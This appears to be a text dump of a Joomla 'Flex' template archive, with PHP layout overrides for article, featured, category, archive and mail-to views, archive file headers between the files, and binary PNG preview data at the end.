<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading clearfix">
	<?php foreach ($this->lead_items as &$item) : ?>
		<article class="item leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?> clearfix" 
			itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</article>
		<?php
			$leadingcount++;
		?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php
	$introcount = (count($this->intro_items));
	$counter = 0;
?>
<?php if (!empty($this->intro_items)) : ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>

		<?php
		$key = ($key - $leadingcount) + 1;
		$rowcount = (((int) $key - 1) % (int) $this->columns) + 1;
		$row = $counter / $this->columns;

		if ($rowcount == 1) : ?>

		<div class="row cols-<?php echo (int) $this->columns;?>">
		<?php endif; ?>
			<article class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?> col-sm-<?php echo round((12 / $this->columns));?>"
				itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
			<?php
					$this->item = &$item;
					echo $this->loadTemplate('item');
			?>
			</article>
			<?php $counter++; ?>

			<?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>

		</div>
		<?php endif; ?>

	<?php endforeach; ?>
<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
	<div class="items-more">
	<?php echo $this->loadTemplate('links'); ?>
	</div>
<?php endif; ?>

<?php if ($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2 && $this->pagination->pagesTotal > 1)) : ?>
	<div class="pagination">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<p class="counter pull-right">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php  endif; ?>
		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
<?php endif; ?>

</div>
PK!̫�-0flex/html/com_content/featured/default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<ol>
<?php foreach ($this->link_items as &$item) : ?>
	<li>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
			<?php echo $item->title; ?></a>
	</li>
<?php endforeach; ?>
</ol>
PK!��X/flex/html/com_content/featured/default_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$params  = &$this->item->params;
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$images  = json_decode($this->item->images);
$canEdit = $this->item->params->get('access-edit');
$info    = $this->item->params->get('info_block_position', 0);
$useDefList = ($params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date')
	|| $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author') );

// Post Format
$post_attribs = new JRegistry(json_decode( $this->item->attribs ));
$post_format = $post_attribs->get('post_format', 'standard');

?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate())) : ?>
	<div class="system-unpublished">
<?php endif; ?>

<?php
	if($post_format=='standard') {
		echo JLayoutHelper::render('joomla.content.intro_image', $this->item);
	} else {
		echo JLayoutHelper::render('joomla.content.post_formats.post_' . $post_format, array('params' => $post_attribs, 'item' => $this->item));
	}
?>

<div class="entry-header<?php echo $tpl_params->get('show_post_format') ? ' has-post-format': ''; ?>">

	<?php echo JLayoutHelper::render('joomla.content.post_formats.icons',  $post_format); ?>
	<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $this->item); ?>
	<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>
		<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
	<?php endif; ?>
	

</div>

<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
	<?php echo JLayoutHelper::render('joomla.content.icons', array('params' => $params, 'item' => $this->item, 'print' => false)); ?>
<?php endif; ?>

<?php if (!$params->get('show_intro')) : ?>
	<?php echo $this->item->event->afterDisplayTitle; ?>
<?php endif; ?>
<?php echo $this->item->event->beforeDisplayContent; ?> <?php echo $this->item->introtext; ?>

<?php if ($useDefList && ($info == 1 || $info == 2)) : ?>
	<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
<?php endif; ?>

<?php if ($params->get('show_readmore') && $this->item->readmore) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link1 = JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId);
		$returnURL = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
		$link = new JUri($link1);
		$link->setVar('return', base64_encode($returnURL));
	endif; ?>

	<?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $this->item, 'params' => $params, 'link' => $link)); ?>

<?php endif; ?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != '0000-00-00 00:00:00' )) : ?>
	</div>
<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?>
PK!JK��+�+)flex/html/com_content/article/default.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

// Create shortcuts to some parameters.
$params = $this->item->params;
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$images = json_decode($this->item->images);
$urls = json_decode($this->item->urls);

$config = \JFactory::getConfig();
$sitename = $config->get('sitename');

$canEdit = $params->get('access-edit');
$page_header_tag = 'h1'; // switch H1 and H2 depending on Page Heading
$user = JFactory::getUser();
$info = $params->get('info_block_position', 0);

// Check if associations are implemented. If they are, define the parameter.
$assocParam = (JLanguageAssociations::isEnabled() && $params->get('show_associations'));

//JHtml::_('behavior.caption');
$useDefList = ($params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date')
	|| $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author') || $assocParam);

//get image
$article_attribs 	= json_decode($this->item->attribs);
$article_images 	= json_decode($this->item->images);
$article_image 		= '';
if(isset($article_attribs->spfeatured_image) && $article_attribs->spfeatured_image != '') {
	$article_image 	= $article_attribs->spfeatured_image;
} elseif(isset($article_images->image_fulltext) && !empty($article_images->image_fulltext)) {
	$article_image 	= $article_images->image_fulltext;
}

//opengraph
$document = JFactory::getDocument();
$document->addCustomTag('<meta property="og:url" content="'. \JURI::current() . '" />');
$document->addCustomTag('<meta property="og:site_name" content="'. htmlspecialchars($sitename) .'" />');
$document->addCustomTag('<meta property="og:type" content="article" />');
$document->addCustomTag('<meta property="og:title" content="'. $this->item->title .'" />');
$document->addCustomTag('<meta property="og:description" content="'. \JHtml::_('string.truncate', (strip_tags($this->item->introtext)), 150) .'" />');
if ($article_image) {
	$document->addCustomTag('<meta property="og:image" content="'. JURI::root().$article_image.'" />');
	$document->addCustomTag('<meta property="og:image:width" content="900" />');
	$document->addCustomTag('<meta property="og:image:height" content="600" />');
}
// Twitter
$document->addCustomTag('<meta name="twitter:card" content="summary" />');
$document->addCustomTag('<meta name="twitter:site" content="'. htmlspecialchars($sitename) .'" />');
$document->addCustomTag('<meta name="twitter:title" content="'. $this->item->title .'" />');
$document->addCustomTag('<meta name="twitter:description" content="'. \JHtml::_('string.truncate', (strip_tags($this->item->introtext)), 150) .'" />');
if ($article_image) {
    $document->addCustomTag('<meta name="twitter:image:src" content="'. \JURI::root().ltrim($article_image, '/') .'" />');
}

$post_format = $params->get('post_format', 'standard');
$has_post_format = $tpl_params->get('show_post_format');
if($this->print) $has_post_format = false;
$show_icons = '';

// PageClass suffix and Featured Article (changed in Flex 3.0.4):
$pageclass = ($this->pageclass_sfx != '') ? ' ' . $this->pageclass_sfx : '';
$featured = ($this->item->featured) ? ' item-featured' : '';
?>
<article class="item item-page<?php echo $pageclass . $featured ?>" itemscope itemtype="http://schema.org/Article">
	<meta itemprop="inLanguage" content="<?php echo ($this->item->language === '*') ? JFactory::getConfig()->get('language') : $this->item->language; ?>" />
	<?php if ($this->params->get('show_page_heading')) : ?>
	<div class="page-header">
		<h1><?php echo $this->escape($this->params->get('page_heading')); ?></h1>
	</div>
	<?php $page_header_tag = 'h2'; ?>
	<?php endif;

	if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && $this->item->paginationrelative) {
		echo $this->item->pagination;
	}
?>
	<?php
		if($post_format=='standard') {
			echo JLayoutHelper::render('joomla.content.full_image', $this->item);
		} else {
			echo JLayoutHelper::render('joomla.content.post_formats.post_' . $post_format, array('params' => $params, 'item' => $this->item));
		}
	?>
    <?php if ($params->get('show_title')) : ?><?php // If Article Title is disabled, then there is no need for (format) Blog icon ?>
    <?php $show_icons = JLayoutHelper::render('joomla.content.post_formats.icons',  $post_format); ?>
	<div class="entry-header<?php echo $has_post_format ? ' has-post-format': ''; ?>">
    <?php endif; ?>
  
		<?php // Edit Article ?>
        <?php if (!$this->print) : ?>
            <?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
                <div class="edit-article pull-right"><?php echo JLayoutHelper::render('joomla.content.icons', array('params' => $params, 'item' => $this->item, 'print' => false)); ?></div>
            <?php endif; ?>
        <?php else : ?>
            <?php if ($useDefList) : ?>
                <div id="pop-print" class="edit-article pull-right hidden-print">
                    <?php echo JHtml::_('icon.print_screen', $this->item, $params); ?>
                </div>
            <?php endif; ?>
        <?php endif; ?>
		<?php if (!$this->print && $useDefList && ($info == 0 || $info == 2)) : ?>
			<?php if($has_post_format) { ?>
            <span class="post-format"><?php echo $show_icons; ?></span>
            <?php } ?>
            <?php if ($params->get('show_title') || $params->get('show_author')) { ?>
            <?php echo '<'. $page_header_tag .' itemprop="headline">'. $this->escape($this->item->title) .'</'. $page_header_tag .'>'; ?>
            <?php } ?> 
            <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>  
        <?php else : ?>
            <?php if($has_post_format) { ?>
        	<span class="post-format"><?php echo $show_icons; ?></span>
			<?php } ?> 
        	<?php if ($params->get('show_title') || $params->get('show_author')) { ?>
                <?php echo '<'. $page_header_tag .' itemprop="headline">'; ?><?php if ($params->get('show_title')) : ?><?php echo $this->escape($this->item->title); ?><?php endif; ?><?php echo '</'. $page_header_tag .'>'; ?>
            <?php } ?> 
        <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
			<?php if ($this->item->state == 0) : ?>
				<span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span>
			<?php endif; ?>
			<?php if (strtotime($this->item->publish_up) > strtotime(JFactory::getDate())) : ?>
				<span class="label label-warning"><?php echo JText::_('JNOTPUBLISHEDYET'); ?></span>
			<?php endif; ?>
			<?php if ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != '0000-00-00 00:00:00') : ?>
				<span class="label label-warning"><?php echo JText::_('JEXPIRED'); ?></span>
			<?php endif; ?>
		<?php endif; ?>  
	<?php if ($params->get('show_title')) : ?><?php // If Article Title is disabled, then there is no need for (format) Blog icon ?>
    </div>
    <?php endif; ?>

	<?php // Show edit SP Page Builder page (article integration) if present, or native edit article  ?>
    <?php if (!$params->get('show_intro') || strpos($this->item->event->afterDisplayTitle, 'SP Page Builder') !== false) : echo '<div class="clearfix sppb_article_edit">'. $this->item->event->afterDisplayTitle .'</div><hr />'; endif; ?>
	<?php echo $this->item->event->beforeDisplayContent; ?>

	<?php if (isset($urls) && ((!empty($urls->urls_position) && ($urls->urls_position == '0')) || ($params->get('urls_position') == '0' && empty($urls->urls_position)))
		|| (empty($urls->urls_position) && (!$params->get('urls_position')))) : ?>
	<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>
	<?php if ($params->get('access-view')):?>

	<?php
	if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && !$this->item->paginationrelative):
		echo $this->item->pagination;
	endif;
	?>
	<?php if (isset ($this->item->toc)) :
		echo $this->item->toc;
	endif; ?>
	<div itemprop="articleBody">
		<?php echo $this->item->text; ?>
	</div>

	<?php if ($params->get('show_tags', 1) && !empty($this->item->tags->itemTags)) : ?>
    	<div style="margin:12px auto;" class="clearfix"></div>
        <?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
        <?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
    <?php endif; ?>
    
    <?php echo JLayoutHelper::render('joomla.content.social_share.share', $this->item); //Helix Social Share ?>
    	<div style="margin:0 auto 35px;" class="clearfix"></div><hr />
        
        <?php if(!$this->print) : ?>
		<?php echo JLayoutHelper::render('joomla.content.comments.comments', $this->item); //Helix Comment ?>
	<?php endif; ?>

	<?php
if (!empty($this->item->pagination) && $this->item->pagination && $this->item->paginationposition && !$this->item->paginationrelative):
	echo $this->item->pagination;
?>
	<?php endif; ?>
	<?php if (isset($urls) && ((!empty($urls->urls_position) && ($urls->urls_position == '1')) || ($params->get('urls_position') == '1'))) : ?>
	<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>
	<?php // Optional teaser intro text for guests ?>
	<?php elseif ($params->get('show_noauth') == true && $user->get('guest')) : ?>
	<?php echo $this->item->introtext; ?>
	<?php //Optional link to let them register to see the whole article. ?>   
	<?php if ($params->get('show_readmore') && $this->item->fulltext != null) :
		$redirectUrl = urlencode(base64_encode(JURI::current()));  
		$link1 = JRoute::_('index.php?option=com_users&view=login&return='.$redirectUrl);
		$link = new JUri($link1);?>
	<p class="readmore">
		<a href="<?php echo $link; ?>">
		<?php $attribs = json_decode($this->item->attribs); ?>
		<?php
		if ($attribs->alternative_readmore == null) :
			echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
		elseif ($readmore = $this->item->alternative_readmore) :
			echo $readmore;
			if ($params->get('show_readmore_title', 0) != 0) :
				echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
			endif;
		elseif ($params->get('show_readmore_title', 0) == 0) :
			echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
		else :
			echo JText::_('COM_CONTENT_READ_MORE');
			echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
		endif; ?>
		</a>
	</p>
	<?php endif; ?>
	<?php endif; ?>
    
    <?php echo $this->item->event->afterDisplayContent; ?>

	<?php
if (!empty($this->item->pagination) && $this->item->pagination && $this->item->paginationposition && $this->item->paginationrelative) :
	echo $this->item->pagination;
?>
	<?php endif; ?>
</article>PK!"�i�		/flex/html/com_content/article/default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create shortcut
$urls = json_decode($this->item->urls);

// Create shortcuts to some parameters.
$params = $this->item->params;
if ($urls && (!empty($urls->urla) || !empty($urls->urlb) || !empty($urls->urlc))) :
?>
<div class="content-links">
	<ul>
		<?php
			$urlarray = array(
			array($urls->urla, $urls->urlatext, $urls->targeta, 'a'),
			array($urls->urlb, $urls->urlbtext, $urls->targetb, 'b'),
			array($urls->urlc, $urls->urlctext, $urls->targetc, 'c')
			);
			foreach ($urlarray as $url) :
				$link = $url[0];
				$label = $url[1];
				$target = $url[2];
				$id = $url[3];

				if ( ! $link) :
					continue;
				endif;

				// If no label is present, take the link
				$label = ($label) ? $label : $link;

				// If no target is present, use the default
				$target = $target ? $target : $params->get('target' . $id);
				?>
			<li class="content-links-<?php echo $id; ?>">
				<?php
					// Compute the correct link

					switch ($target)
					{
						case 1:
							// open in a new window
							echo '<a href="' . htmlspecialchars($link) . '" target="_blank"  rel="nofollow">' .
								htmlspecialchars($label) . '</a>';
							break;

						case 2:
							// open in a popup window
							$attribs = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width=600,height=600';
							echo "<a href=\"" . htmlspecialchars($link) . "\" onclick=\"window.open(this.href, 'targetWindow', '" . $attribs . "'); return false;\">" .
								htmlspecialchars($label) . '</a>';
							break;
						case 3:
							// open in a modal window
							JHtml::_('behavior.modal', 'a.modal');
							echo '<a class="modal" href="' . htmlspecialchars($link) . '"  rel="{handler: \'iframe\', size: {x:600, y:600}}">' .
								htmlspecialchars($label) . ' </a>';
							break;

						default:
							// open in parent window
							echo '<a href="' . htmlspecialchars($link) . '" rel="nofollow">' .
								htmlspecialchars($label) . ' </a>';
							break;
					}
				?>
				</li>
		<?php endforeach; ?>
	</ul>
</div>
<?php endif; ?>
PK!E�8Y��,flex/html/com_content/categories/default.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');
JHtml::_('behavior.core');

// Add strings for translations in Javascript.
JText::script('JGLOBAL_EXPAND_CATEGORIES');
JText::script('JGLOBAL_COLLAPSE_CATEGORIES');

JFactory::getDocument()->addScriptDeclaration("
jQuery(function($) {
	$('.categories-list').find('[id^=category-btn-]').each(function(index, btn) {
		var btn = $(btn);
		btn.on('click', function() {
			btn.find('span').toggleClass('icon-plus');
			btn.find('span').toggleClass('icon-minus');
			if (btn.attr('aria-label') === Joomla.JText._('JGLOBAL_EXPAND_CATEGORIES'))
			{
				btn.attr('aria-label', Joomla.JText._('JGLOBAL_COLLAPSE_CATEGORIES'));
			} else {
				btn.attr('aria-label', Joomla.JText._('JGLOBAL_EXPAND_CATEGORIES'));
			}		
		});
	});
});");
?>
<div class="categories-list<?php echo $this->pageclass_sfx; ?>">
	<?php
		echo JLayoutHelper::render('joomla.content.categories_default', $this);
		echo $this->loadTemplate('items');
	?>
</div>
PK!�n*��2flex/html/com_content/categories/default_items.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

//JHtml::_('bootstrap.tooltip');

$class = ' class="first"';
$lang  = JFactory::getLanguage();

// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$has_lazyload = $tpl_params->get('lazyload', 1);

if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
	<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
		<?php
		if ($this->params->get('show_empty_categories_cat') || $item->numitems || count($item->getChildren())) :
		if (!isset($this->items[$this->parent->id][$id + 1]))
		{
			$class = ' class="last"';
		}
		?>
		<div <?php echo $class; ?> >
		<?php $class = ''; ?>
			<h3 class="page-header item-title">
				<a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($item->id, $item->language)); ?>">
				<?php echo $this->escape($item->title); ?></a>
				<?php if ($this->params->get('show_cat_num_articles_cat') == 1) :?>
					<span class="badge badge-info tip hasTooltip" title="<?php echo JHtml::_('tooltipText', 'COM_CONTENT_NUM_ITEMS_TIP'); ?>">
						<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?>&nbsp;
						<?php echo $item->numitems; ?>
					</span>
				<?php endif; ?>
				<?php if (count($item->getChildren()) > 0 && $this->maxLevelcat > 1) : ?>
					<a id="category-btn-<?php echo $item->id; ?>" href="#category-<?php echo $item->id; ?>"
						data-toggle="collapse" data-toggle="button" class="btn btn-mini pull-right" aria-label="<?php echo JText::_('JGLOBAL_EXPAND_CATEGORIES'); ?>"><span class="icon-plus" aria-hidden="true"></span></a>
				<?php endif; ?>
			</h3>
			<?php if ($this->params->get('show_description_image') && $item->getParams()->get('image')) : ?>
            <?php 
			$cat_image = $item->getParams()->get('image');
			if(strpos($cat_image, 'http://') !== false || strpos($cat_image, 'https://') !== false){
				if($has_lazyload) { ?>
					<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $cat_image; ?>" alt="<?php echo htmlspecialchars($item->getParams()->get('image_alt'), ENT_COMPAT, 'UTF-8'); ?>" data-expand="-10">
				<?php } else { ?>
					<img src="<?php echo $cat_image; ?>" alt="<?php echo htmlspecialchars($item->getParams()->get('image_alt'), ENT_COMPAT, 'UTF-8'); ?>" />
				<?php } 
				} else { 
				if($has_lazyload) { ?>
					<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $cat_image; ?>" alt="<?php echo htmlspecialchars($item->getParams()->get('image_alt'), ENT_COMPAT, 'UTF-8'); ?>" data-expand="-10">
				<?php } else { ?>
					<img src="<?php echo $cat_image; ?>" alt="<?php echo htmlspecialchars($item->getParams()->get('image_alt'), ENT_COMPAT, 'UTF-8'); ?>" />
				<?php }
			} ?>
			<?php endif; ?>
			<?php if ($this->params->get('show_subcat_desc_cat') == 1) : ?>
				<?php if ($item->description) : ?>
					<div class="category-desc">
						<?php echo JHtml::_('content.prepare', $item->description, '', 'com_content.categories'); ?>
					</div>
				<?php endif; ?>
			<?php endif; ?>

			<?php if (count($item->getChildren()) > 0 && $this->maxLevelcat > 1) : ?>
				<div class="collapse fade" id="category-<?php echo $item->id; ?>">
				<?php
				$this->items[$item->id] = $item->getChildren();
				$this->parent = $item;
				$this->maxLevelcat--;
				echo $this->loadTemplate('items');
				$this->parent = $item->getParent();
				$this->maxLevelcat++;
				?>
				</div>
			<?php endif; ?>
		</div>
		<?php endif; ?>
	<?php endforeach; ?>
<?php endif; ?>
PK!���-GG/flex/html/com_content/archive/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
$params = $this->params;
$useDefList = ($params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date')
			|| $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category'));
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
?>

<div id="archive-items">
	<?php foreach ($this->items as $i => $item) : ?>
		<?php $info = $item->params->get('info_block_position', 0); ?>
		<div class="row<?php echo $i % 2; ?>" itemscope itemtype="http://schema.org/Article">

			<div class="entry-header">
				<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>
                	<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>
					<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
				<?php endif; ?>
			</div>

			<?php if (!$params->get('show_intro')) : ?>
				<?php echo $item->event->afterDisplayTitle; ?>
			<?php endif; ?>
			<?php echo $item->event->beforeDisplayContent; ?>
			<?php if ($params->get('show_intro')) :?>
				<div class="intro" itemprop="articleBody"> <?php echo JHtml::_('string.truncateComplex', $item->introtext, $params->get('introtext_limit')); ?> </div>
			<?php endif; ?>

			<?php if ($useDefList && ($info == 1 || $info == 2)) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'below')); ?>
			<?php endif; ?>

		<?php echo $item->event->afterDisplayContent; ?>
	</div>
	<?php endforeach; ?>
</div>
<div class="pagination">
	<p class="counter"> <?php echo $this->pagination->getPagesCounter(); ?> </p>
	<?php echo $this->pagination->getPagesLinks(); ?>
</div>
PK!Pb�X)flex/html/com_content/archive/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('formbehavior.chosen', 'select');
JHtml::_('behavior.caption');
?>
<div class="archive<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading', 1)) : ?>
<div class="page-header">
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
</div>
<?php endif; ?>
<form id="adminForm" action="<?php echo JRoute::_('index.php')?>" method="post" class="form-inline">
	<fieldset class="filters">
	<div class="filter-search">
		<?php if ($this->params->get('filter_field') != 'hide') : ?>
		<label class="filter-search-lbl element-invisible" for="filter-search"><?php echo JText::_('COM_CONTENT_TITLE_FILTER_LABEL') . '&#160;'; ?></label>
		<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->filter); ?>" class="inputbox span2" onchange="document.getElementById('adminForm').submit();" placeholder="<?php echo JText::_('COM_CONTENT_TITLE_FILTER_LABEL'); ?>" />
		<?php endif; ?>

		<?php echo $this->form->monthField; ?>
		<?php echo $this->form->yearField; ?>
		<?php echo $this->form->limitField; ?>

		<button type="submit" class="btn btn-primary" style="vertical-align: top;"><?php echo JText::_('JGLOBAL_FILTER_BUTTON'); ?></button>
		<input type="hidden" name="view" value="archive" />
		<input type="hidden" name="option" value="com_content" />
		<input type="hidden" name="limitstart" value="0" />
	</div>
	<br />
	</fieldset>

	<?php echo $this->loadTemplate('items'); ?>
</form>
</div>
PK!��y��'flex/html/com_mailto/mailto/default.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined('_JEXEC') or die;

JHtml::_('behavior.core');
JHtml::_('behavior.keepalive');

?>
<div id="mailto-window">
	<h2>
		<?php echo JText::_('COM_MAILTO_EMAIL_TO_A_FRIEND'); ?>
	</h2>
	<div class="mailto-close">
		<a href="javascript: void window.close()" title="<?php echo JText::_('COM_MAILTO_CLOSE_WINDOW'); ?>">
			<span>
				<?php echo JText::_('COM_MAILTO_CLOSE_WINDOW'); ?>
			</span>
		</a>
	</div>
	<form action="<?php echo JRoute::_('index.php?option=com_mailto&task=send'); ?>" method="post" class="form-validate">
		<fieldset>
			<?php foreach ($this->form->getFieldset('') as $field) : ?>
				<?php if (!$field->hidden) : ?>
					<?php echo $field->renderField(); ?>
				<?php endif; ?>
			<?php endforeach; ?>
			<div class="control-group">
				<div class="controls">
                    <button type="submit" class="btn btn-success validate">
						<?php echo JText::_('COM_MAILTO_SEND'); ?>
					</button>
					<button type="button" class="btn btn-danger" onclick="window.close();return false;">
						<?php echo JText::_('COM_MAILTO_CANCEL'); ?>
					</button>
				</div>
			</div>
		</fieldset>
		<input type="hidden" name="layout" value="<?php echo htmlspecialchars($this->getLayout(), ENT_COMPAT, 'UTF-8'); ?>" />
		<input type="hidden" name="option" value="com_mailto" />
		<input type="hidden" name="task" value="send" />
		<input type="hidden" name="tmpl" value="component" />
		<input type="hidden" name="link" value="<?php echo $this->link; ?>" />
		<?php echo JHtml::_('form.token'); ?>
	</form>
</div>
PK!��!y!yflex/template_preview.pngnu&1i��PNG


IHDR���ja�gAMA���asRGB���+PLTE���fz����Ws��G3JIJRRR���878ABB5I���fdd%3���k��11/w��������ZZ[���Hdxzyy!���Tk����-BRC86Hk�$IeAYZ{����&)'���4YsHB8KBB ���$)2���eZWSJG3B9���Z[P'Rk'374J\hjn���FXk�ƪ��'2)es�8cz�xtvifA8E�\2۷�Ȧ�uso\RZ6Rh?BK�lIhdW���ɜ���ϒ��˖n�����獄�URH���ͬ���tGMU���yJ$�����.RZ`������Js�[RQ㶋"! ���(Vs��xӫwKJ@�wP���k��������η�ڪ�ɊZFd��[�Ƙ��wk3(-����ҼW8�ϳ��>J@zkr�ļ׬�?JLiYc�Ω����gS�zW��HRGRR[��i��Ŵ����ے�OSIS\]8vu9�V:򛓂������]]�j���SD�����v��nt[���cd�������зU�
R�;}���ɉէ	aW��/����3���_�|׏�{�g|��~"GFĪ���st�HV������a IDATx��sY��k٤�L�m=,��KtS��%�1B
*IӖ1�X6�K ?�\�b�[
�ީ1�}�M��~�� *��	&b"槙����{�ΔT��܈d�z�A��]���;�������x�?�����x�?�����x�?�{
����eq|p�r����:�P��o=N9���\�̄,+i��w����x���?��:�)��~��w?�qoډ���&����o���W�:N��:��y�{��
��]��8q��V+�R ��^�R��������ސ�������Z���p~n��o߾z�y|�OY������g�lǏn��S=�i����C�����=]x_B�|׍w�8wg��/$�G�.;G�����wu
